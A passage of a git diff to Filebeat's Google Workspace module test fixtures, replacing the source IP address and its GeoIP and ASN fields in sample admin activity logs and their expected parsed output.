+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -289,26 +269,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2207,
+        "log.offset": 2202,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -329,7 +305,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -342,26 +318,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2638,
+        "log.offset": 2632,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -383,7 +355,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -399,26 +371,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3069,
+        "log.offset": 3062,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -439,7 +407,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RENAME_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RENAME_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -453,26 +421,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3619,
+        "log.offset": 3611,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -493,7 +457,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -509,26 +473,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4077,
+        "log.offset": 4068,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -550,7 +510,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CHANGE_CALENDAR_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CHANGE_CALENDAR_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -569,26 +529,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 4619,
+        "log.offset": 4609,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -609,7 +565,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CANCEL_CALENDAR_EVENTS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CANCEL_CALENDAR_EVENTS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -621,27 +577,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5208,
+        "log.offset": 5197,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -665,7 +617,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RELEASE_CALENDAR_RESOURCES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RELEASE_CALENDAR_RESOURCES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -677,27 +629,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5598,
+        "log.offset": 5586,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log
index b078b332402e..164c64906f56 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log
@@ -1,4 +1,4 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_CREATE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_DELETE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_MODIFY_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHAT_SETTINGS","name":"CHANGE_CHAT_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_CREATE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_DELETE_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"MEET_INTEROP_MODIFY_GATEWAY","parameters":[{"name":"GATEWAY_NAME","value":"gateway"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHAT_SETTINGS","name":"CHANGE_CHAT_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json
index 34699ff68eaf..2251f84cf3a2 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_CREATE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_CREATE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -23,23 +23,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -60,7 +56,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_DELETE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_DELETE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -72,26 +68,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 384,
+        "log.offset": 383,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
